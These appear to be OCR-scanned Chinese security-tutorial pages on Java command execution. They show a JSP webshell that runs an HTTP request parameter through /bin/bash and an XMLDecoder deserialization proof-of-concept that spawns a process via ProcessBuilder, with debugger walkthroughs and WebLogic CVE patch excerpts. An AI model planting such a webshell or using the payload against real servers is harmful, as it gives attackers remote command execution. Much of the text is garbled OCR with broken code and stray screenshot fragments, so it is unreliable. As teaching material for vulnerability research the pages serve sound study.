drwxrwxrwt 17 root 09:51. 

drwxr-xr-x root 2018 .. 

-rw-rw-rw-@ weirdbird007 15:07 .keystone install lock 
-rnw-r-—r-- weirdbird007 09:48 3.txt| 

=r root 15:07 AlTestl.err 

pepe root 15:07 AlTestl.out 

-DW-r—r— root 09:27 SurgeHelper. log 

SrwxrwxrwX weirdbird@e7 15:11 SurgeHelper. socket 
drwxrwxrwt weirdbird997 11:02 VMwareDnD 

-rw-rw-rw- root 16:07 adobegc. log 

Srw-rw-rw- root 15:07 clamd3.socket 

drwx 一 一 一 weirdbird007 15:07 com.apple. launchd. KK4669BtU8 
drwx-----— weirdbird007 15:07 com. apple, launchd, iS6QYESdI@ 
-rw-r~-r 一 weirdbird007 15:07 escalatelantern.ico 
drwxrwxrwx root 15:07 iNode 

drwxr-xr-x root 15:07 powerlog 

drwx——-—- weirdbird007 15:11 vmware-weirdbird007 


2: Favorites 


6 
è 
T 
1 
1 
1 
g 
4 
1 
T 
3 
3 
1 
4 
2 
3 


KJ Build completed successfully in 1 s 319 ms (moments ago) 


2: RiProcessBuilder 执行 命令 


第 二 种 ， 使 用 ProcessBuilder 类 来 进行 执行 命令 ， 如 果 你 debug 跟 踪 过 上 面 第 一 种 方法 exec 命 令 
式 的 执行 ， 那 你 就 会 明白 ， 其 实 exec 底层 ， 就 是 使 用 ProcessBuilder 。 
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‘© WebShellBasicjava © InputStreamRunnablejava © Runtimeiava - d reece 
















1 throws ee on 
If «code»cmdar is an empty array 
(has J ) 





@see ProcessBuilder 
br @since 1.3 


lic Process exec(String[] cmdarray, String[] envp, File dir) 
throws I0Exception { 
return new ProcessBuilder(cmdarray) 
„environment (envp) 
.directory(dir) 
.start(); 


— 


EX Returns the number of process available to the Java virtual machine. 
* 





Ep» This value may change during a particular invocation of 
* machine. pplications that are s e to the r AS d 
* processors s ( Lone is prope 
metheir resource usage appropriately. </p> 

* 

ee Fem tha T misa ste cred ee i Py ee ree ER 


e  exec() 


1p/ 目录 写 一 个 dbapp.txt ， 顺 便 进 行 执行 ls -al 操作 ， 多 条 命令 执行 ; 
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» 


// 使 用 第 二 种 方法 ProcessBulider 进行 执行 系统 命令 


public void execByProcessBulider(){ 


List<String> params = new ArrayList<String>(); 
params.add("/bin/bash") ; 
params.add("-c"); 
params.add("echo test > /tmp/dbapp.txt ; ls -al /tmp/"); 
// command.add( "cmd.exe" ); 
// command.add( "/c" ); 


// command.add( "ipconfig -all" ); 


ProcessBuilder processBuilder - new ProcessBuilder(params); 
LA System.out.println(processBuilder.directory()); 
Zu System.out.println(processBuilder.environment()); 
processBuilder.redirectErrorStream(true); 


try t 


Process process - processBuilder.start(); 





BufferedReader br = new BufferedReader(new InputStreamReader (pr 
String line; 
while ((line = br.readLine()) != null) { 


System.out.println(line); 


int exitCode - process.waitFor(); 
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j system. out .print1n("exitCode = "+exitCode); 
atch (IOException e) { 


e.printStackTrace( ); 


ER CHOSEProcessBuli 进行 执 
lic void Be a roctestulidertt 
| List«String» params = new ArrayList< g>(); 
= params.add("/bin/bash"); 
o params.add("-c"); 
Params.add("echo test > /tmp/dbapp.txt ; ls -al /tmp/"); 
command. add{ “cmd.exe” 
"Command. add t 
mand. add{ 









ipcor 


Builder processBuilder = new cp sector nbl 

System.out.printl i i y 

ersten. out.prínti onmer 
sBuilder. redirectErrorStream( in i 

{ 


Process process = processBuilder.start(); 





String line; 
while ((line = br.readLine()) != mii) { 
System.out.println(line); 


int exitCnde = nrarecc.waitFar(): 


+ execByProcessBulider() 


18 root wheel 576 Oct 27 10:11. 
6 root wheel 192 Dec 10 2018 .. 


1 weirdbird@@7 wheel @ Oct 24 15:07 .keystone install lock 
1 weirdbird007 wheel 4 Oct 27 09:48 3.txt 

1 root wheel 9 Oct 24 15:07 AlTestl.err 

1 root wheel 9 Oct 24 15:07 AlTestl.out 

1 root wheel 19987 Oct 27 09:27 SurgeHelper. log 

1 weirdbird667 wheel © Oct 24 15:11 SurgeHelper. socket 

4 weirdbird007 wheel 128 Oct 25 11:02 VMwareDnD 

1 root wheel 11926 Oct 24 16:07 adobegc. log 

1 root wheel 0 Oct 24 15:07 clamd3.socket 


3 weirdbird007 wheel 96 Oct 24 15:07 com.apple. launchd. KK4669Btus 
3 weirdbird007 wheel 96 Oct 24 15:07 com.apple. launchd, i56QYESdIO 
1 weirdbird007 wheel 5 Oct 27 10:11 Depp. ixi 

1 weirdbird007 wheel 4286 Oct 24 15:07 escalatelantern.ico 

4 root wheel 128 Oct 24 15:07 iNode 

2 root wheel 64 Oct 24 15:07 powerlog 


$ 3 weirdbird007 wheel 96 Oct 24 15:11 vmware-weirdbird007 


nished with exit code 0 


比如 涉及 webshell 的 攻防 对 抗 ， 其 中 部 分 就 有 涉及 利用 反射 进行 bypass 执行 ， 
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BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream())); 


java 反 射 机 制 是 在 运行 状态 中 ， 对 于 任意 一 个 类 ， 都 能 够 知道 这 个 类 的 所 有 属性 和 方法 ; 对 
一 个 对 象 ， 都 能 够 调用 它 的 任意 方法 和 属性 ; 这 种 动态 获取 信息 以 及 动态 调用 对 象 方法 的 功 
java 语 言 的 反射 机 制 。 


java 反 射 涉及 的 类 : 

Class 类 : 代表 类 的 实体 ， 在 运行 的 Java 应 用 程序 中 表示 类 和 接口 

Field 类 : 代表 类 的 成 员 变量 (类 的 属性 ) 

Method: 代表 类 的 方法 

Constructor: 代表 类 的 构造 方法 

Class 类 中 常见 使 用 的 

1: 获 取 的 类 中 的 方法 

forName(String className): 根据 类 名 返回 类 的 对 象 

getName(): 获得 类 的 完整 路 径 名 字 

2: 获 取 类 中 属性 相关 

getFields() : 获得 所 有 公有 的 属性 对 象 

getDeclaredFields(): ”获得 所 有 属性 对 象 ( 带 Declared 的 可 以 获取 到 私有 private) 
3: 获 得 类 中 方法 

getMethods(): 获得 该 类 所 有 公有 的 方法 

getDeclaredMethod(String name, Class...<?> parameterTypes): 获得 该 类 某 个 方法 
getDeclaredMethods(): 获得 该 类 所 有 方法 

Field 类 常见 使 用 的 

equals(Object obj): 属性 与 obj 相 等 则 返回 true 

get(Object obj) : 获得 obj 中 对 应 的 属性 值 

set(Object obj, Object value): 设置 obj 中 对 应 属性 值 

Method 类 

invoke(Object obj, Object... args) 传递 object 对 象 及 参数 调用 该 对 象 对 应 的 方法 
Constructor 类 


newlInstance(Object... initargs): 根据 传递 的 参数 创建 类 的 对 象 


第 一 个 基础 的 命令 执行 vebshell 
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. 编写 1 个 执行 命令 的 testjsp ,接收 guest OH, TTS SHO 





5 脚本， 目前 逻辑 只 做 了 linux 下 的 判断 
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<%@page 


import="java.io.*,java.util.*, java.net.*,java.text.*"%> 


<% 
String cmd-zrequest.getParameter("guest"); 
// System.out.println(System.getProperty("os.name").toLowerCase()); 
String line; 


if(!System.getProperty("os.name").toLowerCase().contains("win")){ 


List<String> params = new ArrayList<String>(); 
params.add("/bin/bash"); 

params.add("-c"); 

params.add(cmd); //echo test > /tmp/dbapp.txt ; ls -al /tmp/ 
// command.add( “cmd.exe” ); 

// command.add( "/c" ); 


// command.add( "ipconfig -all" ); 


ProcessBuilder processBuilder - new ProcessBuilder(params); 
Th System.out.println(processBuilder.directory()); 
// System. out. println(processBuilder.environment()); 
processBuilder.redirectErrorStream(true); 


wy 
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E 5 
Process process = processBuilder.start(); » Es" 


BufferedReader br = new BufferedReader(new InputStreamReader (process 
while ((line = br.readLine()) != null) { 
System.out.println(line); 
out.println(line); 
out.println("«br»"); 


int exitCode - process.waitFor(); 


) catch (IOException e) ( 


i 
Y 


e.printStackTrace(); 
catch (InterruptedException e) ( 


e.printStackTrace(); 


and: <%= cmd %> completes;</h1> 
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SURO CAR VIS RRR ON ne 
< C Q © localhost test_war_exploded/2 js 
次 最 常 访问 


total 72 

drwxrwxrwt 15 root wheel 480 Oct 28 07:25 . 

drwxr-xr-x 6 root wheel 192 Dec 10 2018 .. 

-rw-rw-rw-@ | weirdbird007 wheel 0 Oct 28 07:19 .keystone, install. lock 
-rw-r--r-- ] root wheel 0 Oct 28 07:19 AlTest!.err 

-rw-t--r-- | root wheel 0 Oct 28 07:19 AlTestl.out 

-rw-r--t-- | root wheel 2100 Oct 28 07:20 SurgeHelper.log 

srwxrwxrwx 1 weirdbird007 wheel 0 Oct 28 07:19 SurgeHelper.socket 

-rw-rw-rw- | root wheel 16674 Oct 28 07:25 adobegc.log 

srw-rw-rw- ] root wheel 0 Oct 28 07:19 clamd3 socket 

drwx------ 3 weirdbird007 wheel 96 Oct 28 07:19 com.apple.launchd.S4C8MwHjqM 
drwx------ 3 weirdbird007 wheel 96 Oct 28 07:19 com.apple launchd. qXv VKCSFBt 
-rw-r--r-- | weirdbird007 wheel 5 Oct 28 07:25 dbapp.txt 

-rw-r--r-- ] weirdbird007 wheel 4286 Oct 28 07:20 escalatelantern.ico 
drwxrwxrwx 4 root wheel 128 Oct 28 07:19 iNode 

drwxr-xr-x 2 root wheel 64 Oct 28 07:19 powerlog 


command: Is -al /tmp/ completes; 


exec 





E A <hr cared UU nn tere nd cQ 
importe"java.io.*,java.util.*,java.net.*,java.text.^"$» 











ORG v2.1.5.3 (NGC. 
d«* 
String cmd Y 8 i fo REAL AR RAN 
System operty 
String iine 
àifi!System.getProperty toLowerCas 
List<String> parame new ArrayListéStri KAHH RRIT 0 用 时 -0 och 
* 文件 ANERO RA GR 
ES: =e as 
r 
XEN- ^ 
s aua mE sb mAs = los 
党 ud 
edr ^ x. 
Lord 
Am execjsp i 
TE 
Re 
e Br 
edr Pe 
ie am Ci aa 
webshettat 
ede 
xray windows. , 
iue w > 


今天 我 们 的 第 一 个 简单 的 命令 执行 webshell 完成 。 我 们 下 期 再 见 。 
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hmsd 师 傅 关 于 xmldecoder 的 解析 流程 分 析 文章 《XMLDecoder 解 析 流 程 分 析 》， 然 后 
跟 一 下 ， 我 测试 的 java 版 本 是 1.8.0_171。 


代码 


.io.BufferedInputStream; 
Va.io.File; 
va.io.FileInputStream; 

Iva. beans . XMLDecoder ; 


soxmldecoder { 


Be void XMLDecode Deserialize(String path) throws Exception { 
> new File(path); 

ream fis - new FileInputStream(file); 

utStream bis - new BufferedInputStream(fis); 

; new XMLDecoder (bis); 


ic Void main(Str 
EDeserialize Tes 


= /Users/11nk3r/Desktop/poc.xml"; 





ing[] args){ 





251 


<?xml version= encoding="U? ?» 


«java version- class= é í : > 








OL Li 


«string»/Applications/Calculator.app«/string» 





0x03 前 置 知 识 
这 里 我 选择 在 java.lang.ProcessBuilder 接收 array 类 型 数据 传 入 的 地 方 下 个 断 点 。 
. command) { 


ArrayList<>(command. | 
: command) 


and. add(arg) 





可 以 看 到 整个 解析 流程 涉及 到 的 类 和 构造 方法 大 概 就 是 如 下 所 示 ， 这 里 我 们 看 到 一 个 在 
package:com.sun.beans.decoder 中 DocumentHandler 类 中 parse 解析 了 ， 我 们 的 传 入 的 xml 
文件 。 
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tHandler 


tHandler 
tHandier 


[DocumentHan í f i 
Accesstontroltontext acc = sControlter. getContext(); 


M ring, Class«? extends ElementHandler>> handlers = new HashMap(); 
Map<String, Object» environment = new HashMap(); 
List<Object> objects = new ArrayList(); 
Reference<ClassLoader> loader 
ExceptionListener listener; 
Object owner 
ElementHandler handler; 





跟 进 一 下 DefaultHandler 类 ， 我 们 可 以 知道 它 是 使 用 sax 来 解析 xml 的 默认 handler ， 而 且 代 码 


里 来 看 它 主要 实现 了 EntityResolver , DTDHandler , ContentHandler , ErrorHandler 这 四 个 
handler 。 


N 
YI 
UJ 


org.xml.sax.helpers; 
java.io.IOException; 
org.xml.sax.InputSource; 
org.xml.sax.Locator; 
org.xml.sax.Attributes; 
org.xml.sax.EntityResolver; 
org.xml.sax.DTDHandler; 
org.xml.sax.ContentHandler; 
org.xml.sax.ErrorHandler; 
org.xml.sax.SAXException; 
org.xml.sax.SAXParseException; 


回 过 头 来 看 DocumentHandler 这 个 类 ， 在 这 个 类 的 构造 方法 中 ， 我 们 看 到 了 XMLDecoder 对 每 
种 支持 的 标签 都 实现 了 一 个 继承 与 ElementHandler 的 类 。 


DocumentHandler() { 
»setElementHandler("java", JavaElementHandler. 
s,SetElementHandler('"ni , NullElementHandler. 
iis.setElementHandler("array", ArrayElementHandler. 
his.setElementHandler("class", ClassElementHandler. 
.SetElementHandler("stri , StringElementHandler. 
>. setElementHandler(' , ObjectElementHandler. 
.setElementHandler(' VoidElementHandler..: 
setElementHandler(' CharElementHandler. c 
ME ByteElementHandler. E 
, ShortElementHandler 
IntElementHandler. cla 
LongElementHandler..: 
FloatElementHandler 
DoubleElementHandler 
.SetElementHandler('b i epee ahe lene drbandter, g 
setElementHandler(' NewElementHandler. 
setElementHandler(' VarElementHandler.c 
setElementHandler 2", TrueElementHandler.c 
.setElementHandler(' FalseElementHandler 
.SetElementHandler(" f: FieldElementHandler.cl 
, MethodElementHandler.: 





所 以 从 目前 来 看 DocumentHandler 这 个 构造 函数 主要 的 作用 就 是 创建 各 个 标签 对 应 的 
ElementHandler 并 进行 调用 。 当 然 关 于 DocumentHandler 类 因为 是 继承 了 DefaultHandler 
类 ， 这 一 点 我 们 前 面 聊 到 了 ， 而 DefaultHandler 类 中 解析 xml 的 工作 主要 交付 给 了 
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dler 接口 ， hadi 相关 内 容 可 以 参 
E ponderis, XBERES—TF@tnmsdiig@Snns, AARREKA 





加 ts ——— 


434 DocumentHandler: 调用 对 应 ElementHandler 的 endElement 





一 级 的 ElementHandier。 






&EElementHandlerByendElementtAk, FER 



















laracter EN render. ElementHandler& BSaddC 


[); 其 余 的 会 抛 


K? 








pag r 





tt ibute ElementHandler: 添加 属性 ， 每 种 标签 3 





BxtBean ElementHandler: X R, 上 时 ， 要 从 获 
ject/void/new 标 签 Handler 所 全 象 。 该 7 





WeObject 方 法 。 


MeObject ElementHandler: 获取 当前 标签 所 产生 的 对 象 对 应 的 ValueObject 实 例 。 具 
要 看 每 个 ElementHandler 类 。 


nent ElementHandler: 判断 








ent ElementHandler: 为 当前 级 标 


Coder 相 关 的 其 它 两 个 成 ; 





用 进行 增加 








mentHandler 的 parent 为 null， 


DocumentHandier 对 象 。 
MLDecoder 对 象 。 


文件 中 的 单个 node 节 点 5 ( 根 节点 ) 的 流程 在 DefaultHandler 中 一 般 是 三 步 走 : 


n ->characters->endElement 。 
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针对 node 节 点 (ER) 的 解析 流程 在 中 是 四 步 走 DefaultHandler 中 一 般 是 四 步 走 : startElemen 
>characters->endElement->characters, | 


所 以 总 结 来 看 本 质 上 最 有 关系 的 还 是 这 三 个 构造 方法 startElement、characters、 endElement, | 


然后 ， 我 们 可 以 看 看 DocumentHandler 中 的 这 些 ElementHandler 的 继承 关系 ， XS See 
下 idea 的 uml 的 功能 ， 使 用 方法 很 简单 ， 选 择 一 个 你 想 要 看 的 方法 ， 右 键 选 择 Diagrams 。 


DocumentHandler() { f X 036C 
. SetE£lementHandler( , JavaElemen Copy Rolarence A 


.setElementHandler( NullElemen lọ Paste 36V 
« setE lementHandler( ArrayElem Paste from History.. DEV 
»setE lementHandler( ClassElem 3 - A 

. setElementHandler( stringEl Paste Simple NOV 
-SetElementHandler( ObjectEl. Column Selection Mode tr i: 
.SetElementHandler( VoidElemen 

.sSetElementHandler( CharElemen Find Usages XF7 
-SetElementHandler( ByteElemen 
.SetElementHandler( ShortElem 
-SetElementHandler( 
.setElementHandler( 
,SetElementHandler( 
.SetElementHandler( 

. SetElementHandler( 

. setElementHandler{ 
.SetElementHandler( 

. setElementHandler( TrueEleme 


Refactor 


Search with Google 
Go To 


Generate 
mentHandler DocumentHandter() 


W Evaluate Expression 
Xy Run to Cursor 

“r Force Run to Cursor 
é Add to Watches 


vailable 


您 Compare with Clipboard 


. 4 Diagram ah Show Diagram. 
® Create Gist... sh Show Diagram Popup 


然后 每 次 选择 add Class to Diagram 就 可 以 增加 你 要 看 的 相关 类 。 


dler.class ih JavaElementHandler @ DefaultHandler.java [c V2 T 


aoaacscocmmed 


: mien eee 


b getOwner() DocumentHandler | 
° setOwner(DocumentHandler) void | 


à getParent() ElementHandler | 


° setParent(ElementHandler) void | 

New > e(String) Object | 

Show Categories > tBean() Object | 

dl Change Visibility Level > ite(String, String) void | 
void 

void | 

void | 


最 后 就 生成 了 下 面 这 3 











击 美 于 xmldecoder 对 应 的 xml 文 件 语法 书写 如 下 所 示 : 


0x04 流程 跟 进 


区 里 跟 进 一 下 上 面 的 那些 基础 知识 分 析 过 的 内 容 ， 首 先 按照 我 们 的 了 解 来 看 ， 针 对 xm 文件 的 解析 
最 早 应 该 是 使 用 DefultHandler 中 startElement ， 我 们 在 这 里 下 个 断 点 。 


Element(String vari, String var2, String var3, Attributes var4) throws SAXException { 
5 = this handler is t 


= (Elemen 


etParent(var5); 
vari@) { 
xception(vari8) 


= 0; var6 < var4.getLeagth(); **var6) { 


9 var? = var4.getQName(var6) ; 

9 varg = var4.getValue(var6) ; 
-handler.addAtéribute(var7, varg); 
(RuntimeException var9) 4 
-handleException(var9) ; 


chandler, startElement i3 AY Stan 





O 最 开始 的 节点 叫 java， 所 以 这 里 解析 出 来 对 应 的 对 应 的 handler 是 
YavaElementHandler A 


<?xml version="1.0" encoding="UTF-8"?> 

«java version="1.8.0_131" class="java.beans.XMLDecoder"> 
<object class="java.lang.ProcessBuilder"> 

<array class="java.lang.String" length="2"> 

«void index="0"> 

<string>open</string> 

</void> 

«void index="1"> 
<string>/Applications/Calculator.app</string> 

</void> 

</array> 

«void method="Sstart" /> 

</object> 

</java> | 


而 JavaElementHandler 中 的 addAttribute 构造 函数 的 作用 就 是 添加 相应 的 属性 ， 比 如 version 
的 属性 是 版 本 信息 这 里 是 1.8.0_131 ， 而 另 一 个 就 是 class 这 里 是 java.beans.XMLDecocer 。 


{ 
(!vari.equals( D» 
(vari.equals( 954 l 
„type = .getOwner().findClass(var2); 
} { 1 
.addAttribute(vari, var2); ] 
} 
; D. 


所 以 开始 第 一 次 addAttribute 的 结果 是 version 和 它 对 应 的 值 ， 当 然 这 个 解析 过 程 不 是 一 次 , 单 
单 是 下 面 内 容 就 会 执行 两 次 解析 过 程 。 | 


java version-"1.8.0 131" class="java.beans.XMLDecoder" 


addAttribute(String vari, String var2) { 
(!var1. equals ( PEE! 
(vari. equals ( ji 
.type = this.getOwner().findClass(var2) 
of 3 
-addAttribute(var1, var2) 


id addAttribute(String vari, String var2) { 
f (1var1.equals('v )) + 
(var1.equals( 4 
is.type = this.getOwner(). findClass(var2) 


ibute(vari var2); 
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当然 关键 不 在 这 ， ， 我 想 知道 为 什么 能 够 执行 java.lang.ProcessBuilder 这 个 类 ， 从 前 面 debug 过 程 
来 看 ， 如 果 。 startElement 解析 道 这 里 处 理 之 后 对 应 的 handler 应 该 是 ObjectElementHandler 


o 


«object class- 

«array class- 

«void index= 
Eetring»openc/string» 
«/void» 

«void index- 
estring»/Applications/Calculator.app /string» 
«/void» 

</array> 

«void method= 


</object> 
在 这 里 下 一 个 断 点 ， 果 然 进来 了 ， ObjectElementHandler 里 面 的 addAttribute 方法 没有 能 够 解 
析 class 的 选项 。 


ttrihutelString varl String.xar2)..t 


valueOf(var2) 
. index) 


startElement() { 
> addAttribute() 


Variables 


= 
$ 


23 40 — this.= (Object 


2-220 c 


i» Q vari 


| TA 


m ObjectElementHandler 继承 了 NewElementHandler ， 所 以 这 里 便 使 用 
dh 








tring Tarer tore). 
String field; tiell: 
Integer index; index 
String property; es 
String method; 


这 里 的 type 自然 就 是 名 字 是 java.lang.ProcessBuilder 的 类 。 


Her java a DocumentHandler.class a ObjectElementHandler.class a NewElementHandler class [c] JavaElementHandler ci... 


d .class file, bytecode version: 52.0 (Java 8) 


NewElementHandler ElementHandler { 
List<Object> arguments = ArrayList (deg «i 
ValueObject value pr 
Class<?> type 


mentHandler() 


addAttribute(String varl, String var2) { 
(vari. equals( )) { á 
type = 154getownertj ifindctasstvar2j2 type: null var2: "Jáva; lang.ProcessBuildep*; 
X: 
.addAttribute(varl, var2) 


这 里 处 理 完了 之 后 就 会 继续 调用 ArrayElementHandler 4 array 的 内 容 了 ， 然 后 调用 
VoidElementHandler 处 理 void 标签 的 内 容 ， 而 VoidElementHandler 也 是 继承 来 自 于 
ObjectElementHandler ， 自 然而 然 也 是 回 到 了 ObjectElementHandler 中 的 addAttribute 中 
Te 


VoidElementHandler exte ObjectElementHahdler {| 
VoidElementHandler() { 


isArgument() 
入 到 了 


addAttribute(String vari, String var2) { 
(var1. equals ( )) { 
-idref = var2 
(var1. equals ( EE! 
s field. card : 
(varl.equals( )) i 
.index = Integer.valueOf(var2) 
.addArgument ( ! -~ index): index: Ls 
vari-equatst ety] 4 
j.property = var2 
(var1.equals( ) t 


i i addAttribute(String vari, String var2) { 
.equals( )) { 
yis.idref = var2 
{var1.equals(" y 4 
.field = var2 
(var1. equals ( ht 
1is.index = Integer. valueOf(var2) ; 
xis. addArgument (this. index); 
f {vari.equats( yt 
jproperty = var2; Ju — : 
(vari. equals( athod Dy Edi i | 
h3s.method = yar2 method: mat wares "start" ue 
a p 5 nat et 
bu vot, var2); 


当然 前 面 过 程 void 标签 处 理 完 之 后 ， 首 先 会 进入 DocumentHandler 的 endElement 方法 进行 处 | 
理 ， 而 这 个 方法 中 调用 了 ElementHandler 中 的 endElement 构造 方法 。 





J/pocul z 
public void { 


| try { 
this. handler .endElement(); 


J catch (RuntimeException vars) { 
"mis.handleException(var8); 


Dy finally ( 
this.handler = .handler.getParent(); 


} 
E 













int endElement 构造 方法 中 调用 了 getValueObject ， 这 个 方法 设置 了 在 endElement 中 被 设置 
成 了 天 不 抽象 类 ， 我 们 通过 在 java.lang.ProcessBuilder 处 下 一 个 断 点 ， 可 以 看 到 自然 进 到 了 
NewElementHandler 中 的 getValueObject 了 。 


Epublic void { 

-ValueObject vari = .getValueObject(); 

if (!vari.isvoid()) { 

(this.id != null) ( 

is. owner .setVariable( .id, vari.getValue()); 


(this.isArgument()) { 
mnis. parent != null) { 
his.parent.addArgument(vari.getValue()); 
se ( 

Owner .,addObject(vari.getValue()); 


t.ValueObject getValueObject() 
Choose Implementation of getValueObject (6 methods found) 
AccessorElementHandler | 
JavaElementHan 
eem "dida 
NullElementHandler 


StringElementHandler (com.sun.beans.decoder < 1.8 » (rt.jar) Bi 
VarElementHandler (com: sun. beans. decoder) < 1.8 » (rt.jar) Bm 


1 Valueübject getValueübjéct() 4 
i argues Iz od). 4 


EEC 
getOwner{) .handleException(vars5) 
1 


:arguments = 


© ElementHandier 

* getOwner() DocumentHandie 
setOwner(DacumentHandier) ^ void 
getParent() ElementHandier 


gid 


J, String) 


UN 
* FlaldElementHandiec 
addAttributelString, String) 
* 
* Var£lementHandler 
String, String) void |* } 
ValueObject e Object) 
getFieldValue(Object, String) 
sotFieldValui String, Object) 


tArguments(Object[], C <? £ ; - 
i ) « findFleld (Object, String) 


ObjectElementHandier T «© ArayElementHandier ETEN " P" 
sds Ing, String vo addAttribute(String, String) oi * MethodElementHandier | 

start£lement() 3 addAttributa(String, String) void i* 
© t isArgument() »oolean getValueObject/Class«?», Object]])) — ValueObject 
(D * getValueObject(Ciass«?», Object(]) — ValueObject bd 3 


* VoidElementHandler 


isArgument() boolean 


上 面 的 NewElementHandler 中 的 构造 方法 getValueObject 在 ObjectElementHandler 、 
ArrayElementHandler 、 MethodElementHandler 中 分 别 被 重 写 了 。 


ValueObject get it aaa varl, Object[] var2) throws Exception { 
null) ( 
i. T11eaalAraumentExcent ion(^ Cl name is not set" 
Choose Overriding Method of getValueObject (3 methods mane ^» 


< 1.8 > (rt.jar) By, 


[d osecictaeniionfar om.sun.beans.decoder) < 1.8 > (rt.jar) By J 


return ValueObjectImpl.create(var4.newInstance(var2)); 


因为 我 们 payload 里 面 关 于 命令 执行 使 用 的 是 object 标签 ， 所 以 自然 就 进来 到 了 
ObjectElementHandler 中 ， 然 后 这 里 有 调用 了 getContextBean 方法 ， 而 根据 继承 关系 ， 
法 调用 的 是 NewElementHandler 中 的 getContentBean 方法 





peturn this.type != ? type : .getContextBean(); 


fi NewElementHandler 中 的 getContextBean 方法 又 是 因为 继承 关系 调用 了 来 自 于 
ElementHandler 中 的 getContextBean 方法 。 


protecte: { 
Gf (this.parent != ant 
ValueObject var2 = .parent.getValueObject(); 


if (!var2.isVoid()) ( 

return var2.getValue(); 

| } eise { 

throw new IllegalStateException( ); 
| } 

} else { 

Object vari = .Owner .getOwner ( ); 

if (vari !- yf 

return vari; 

} else { 

throw new IllegalStateException( ); 
) 

} 















而 这 里 的 getValueObjcet 操作 根据 我 的 断 点 执行 了 两 次 。 





NewElementHandler (com s.decoder) [1] | 


我 们 可 以 看 一 下 结果 ， 第 一 次 进入 NewElementHandler 中 进行 getValueObject 实际 上 在 type 


PEERS class 的 值 的 。 而 第 二 次 进入 NewElementHandler 8317 getValueObject 操作 的 时 
Ape 是 取 到 相关 的 class 的 值 。 


ect getValueObject() { 
r3 


-getValuedbject( «type arguments. toArray () $ 


on var5) { 
«handleException({var5) 


Exception { 


yy 
d- 


getValueübject() 1 
) ( 


©, getValueObject( 
xception vars) { 
ietOwner(), handleExcept ion(var$) 
if 


irguments = 


„type .arguments.toArray()) 


那么 根据 上 面 所 说 这 里 势必 会 进入 到 ObjectElementHandler 中 的 getValueHandler 方法 进 和 


理 ， 而 在 这 个 方法 的 最 后 是 调用 了 Expression 中 的 getValue 方法 ， 这 里 可 以 看 到 我 们 要 执 往 
命令 以 及 class 对 象 都 已 经 传 入 了 。 


ValueObject getValueObject(Class«?» varl, Object[] var2) Exception { 
„field {= ) f 


ValueübjectImpl,create(FieldElementHandler.getFieldValue( -getContextBean() 
( „idref != ) 1 


ValueObjectImpl, create( -getVariable( .idref)) 


Object var3 -getContextBean{ ) 


.property.length()) { 
vars + «property. substring(@, 1). toUpperCase{Locale. ENGLISH) + property. substring(1) 


«method != && O< method. length() ? «method : 


Expression var5 = Expression(var3, var4, var?) 


ValueObjectImp1. create(varS.qetValue()); 
) 


ObjectElementHandler getValueObject() 


Variables 





[i 
4, » = this = (ObjectElementHandier@732} 


@ Variables debug info not available 


3} "class java.lang.ProcessBuilder" 


> 0 = 
> 1= 


= var3 (slot “class java.lang.ProcessBuilder” 
EE var4 (slot 


Pee Vary (Sot T "eünbounds Class HeW(StrINGAttay), 


而 进一步 动态 调试 我 


可 以 看 到 Expression 中 的 getValue 已 经 返回 我 们 需要 的 命令 执行 对 象 
类 ， 以 及 命令 参数 了 。 


getValue() throws Exception < 


setValue( invoke{)); 


* @param The va 


Expression getValue() 


ES Variables 
PEIUS 


= ES rocessBulldersClass,new(StringArray)” — | 
i ME @ value g 
v: @ command 


© environment = null 














E 


AGRE MEE Void 标签 对 应 的 getValueObject 函数 ， 由 于 ViodElementHandler 继承 
objectElementHandler ， 而 我 们 这 里 设置 的 method SF start ， 因 此 这 里 通过 Expression 的 
种 调用 了 start 函数 ， 所 以 到 这 里 自然 命令 执行 了 。 





). toUpperCase(Locale. ENGLISH) + 
od. length() ? method 


ores ar, var2) 
etelvarS.getValue(]). vars {slots}: ” 


^ 3B Variables 


<unbound>=ProcessBuilder.start(); 


BPS: 其 
然后 再 补充 一 下 @fnmsd 师 傅 画 的 流程 图 











SAX E 
XML 解析 XML 解析 
| | | 
Document | ; i 
Handler | startElement characters endElement 
3 | 
| | 
Element LTR T T 
: 调用 调用 
Handler ElementHandler, addCharacter getValueObject 
Millparentis 依次 添加 标签 包 于 获取 标签 创建 的 对 
omer 的 字符 象 或 进行 操作 
| eee UN Od Ace 
| pa 
2 .添加 属性 men ais; 
(addAttribute) 需要 上 级 对 象 时 调 不 需要 时 直接 返 区 
j getContextBean Value, 
E | 获取 ， 再 创建 对 象 。 
| 3, 调用 对 应 的 Y 
| ElementHandler isArgument 判 断 是 否 
B:s E 43 上 一 级 的 参 类 
| 的 startElement 回 湖 到 上 一 级 AL 级 的 参数 | 
ElementHandler [一 一 调用 上 一 级 m 
—— —| addArugment 进 行 参 
数 添加 
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0x05 补丁 


Oracle 关 于 这 个 xmldecoder 造 成 的 漏洞 的 CVE 编 号 分 别 是 CVE-2017-3506、CVE-2017-10271、 
CVE-2019-2725。 最 早 关 于 CVE-2017-3506 的 补丁 只 是 根据 Dbject 标 签 进行 了 限制 。 


private void validate(InputStream is) 


T 
WebLogicSAxParserFactory factory = new WebLogicSAXParserFactory() ; 
try 
1 


SAXParser parser = factory.newSAXParser() 
parser.parse(is, new DefaultHandler() 


private int overallarraylength - 0; 


public void startElement(String uri, String localName, String qName, Attributes attributes) 
throws SAXException 
1 
if (qName.equalsIgnoreCase('ot EISE 
throw new IllegalStateException('! j el Name : object"); 
} 


而 根据 我 们 前 面 的 继承 关系 可 以 讲 object 替换 成 void 即 可 ， 它 们 实际 上 是 不 受 影响 的 ， 因 此 便 出 
现 了 CVE-2017-10271， 而 针对 CVE-2017-10271 的 补丁 限定 了 所 有 具有 执行 的 节点 。 


private void validate(InputStream is) 


WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory() 
try 


SAXParser parser = factory.newSAXParser(); 
parser.parse(is, new DefaultHandler() 


private int overallarraylength = 0; 


public void startElement(String uri, String localName, String qName, Attributes attributes) 
throws SAXException 
- | if (qName.equalsIgnoreCase(“object")) { 
THROW new Ttiegatstateexceptiont"Tmustid element qName:object"); 
- if (qName.equalsIgnoreCase('c1ass")) f 
throw" mew" TotegatStateexceptromt^trvalid element qName:class"); 
| if (qName.equalsIgnoreCase("nev^)) A 
"trou new TUVEGSTSTECEERCEDTION(™ d element qName:new"); 
p "i 
- (qNane. equalsTgnorecase( 3) { 
eror new Tilegalstatetsceptiont "Invalid element qName:method"); 
} " ake 
= | (quane. equalsIgnoreCase( void")) ( 
